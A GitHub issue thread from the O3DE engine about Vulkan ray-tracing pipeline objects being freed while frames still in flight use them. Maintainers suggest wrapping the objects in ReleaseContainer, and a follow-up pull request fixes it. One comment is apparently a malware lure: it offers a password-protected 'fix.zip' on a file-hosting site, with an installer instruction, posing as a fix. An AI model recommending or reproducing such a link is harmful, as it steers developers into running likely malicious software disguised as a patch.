### ISSUE TITLE
Vulkan Raytracing Objects prematurely freed - wrong memory management.

### ISSUE THREAD

**Issue by jhmueller-huawei** [o3de/o3de#18267]
**Describe the bug**

#18240 fixed the error that ray tracing pipelines were leaking, since they were never freed. However, the implementation of Vulkan's `RayTracingPipelineState` differs significantly from the default `PipelineState` as Vulkan objects (VkPipeline, VkPipelineLayout and VkShaderModule specifically) are directly stored rather than through an `RHI::Ptr<Pipeline>` as `PipelineState` does. The latter properly handles freeing the resources through the device's release queue, while `RayTracingPipelineState` directly frees them in the `ShutdownInternal` method. This causes validation errors as the objects may still be in use of frames that are currently in flight. This needs a correct implementation.

**Assets required**
ASV

**Steps to reproduce**
Try any ray-tracing using sample in the ASV and switch to another which causes the ray-tracing pipeline to be freed.

**Expected behavior**
No validation errors.

**Actual behavior**
Premature release of Vulkan objects.

**Found in Branch**
development

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by moudgils** [comment]
Is it possible to simply add release queue to the destructor for RayTracingPipelineState as well?

**Comment by jhmueller-huawei** [comment]
Not really, since the RayTracingPipelineState is freed from outside of Vulkan where you don't know about Vulkan's release queue and it could also be a DX12 one. All the native Vulkan handles like VkBuffer, VkDescriptorSet, VkPipelineState, etc. usually live in separate objects held by the public facing API classes, I guess precisely because this way they can be added to the release queue, when the public facing object is freed.

It shouldn't be difficult to fix this, but it's a bit of work and maybe should happen as part of a bigger overhaul of the ray tracing API. This is part of the reason why I asked this: https://discord.com/channels/805939474655346758/1277920224246501469

**Comment by moudgils** [comment]
> > Not really, since the RayTracingPipelineState is freed from outside of Vulkan where you don't know about Vulkan's release queue and it could also be a DX12 one. All the native Vulkan handles like VkBuffer, VkDescriptorSet, VkPipelineState, etc. usually live in separate objects held by the public facing API classes, I guess precisely because this way they can be added to the release queue, when the public facing object is freed.
> > It shouldn't be difficult to fix this, but it's a bit of work and maybe should happen as part of a bigger overhaul of the ray tracing API. This is part of the reason why I asked this: https://discord.com/channels/805939474655346758/1277920224246501469
> 
> Maybe you can use the Vulkan::ReleaseContainer object to wrap any Vulkan object and add it to the device release queue. That's what we do for some objects

+1 to this approach. Take a look at existing usage of ReleaseContainer for VK object destruction and apply that for your own use case.

**Comment by jhmueller-huawei** [comment]
Ah, that's helpful, didn't know this exists. #18299 fixes this.
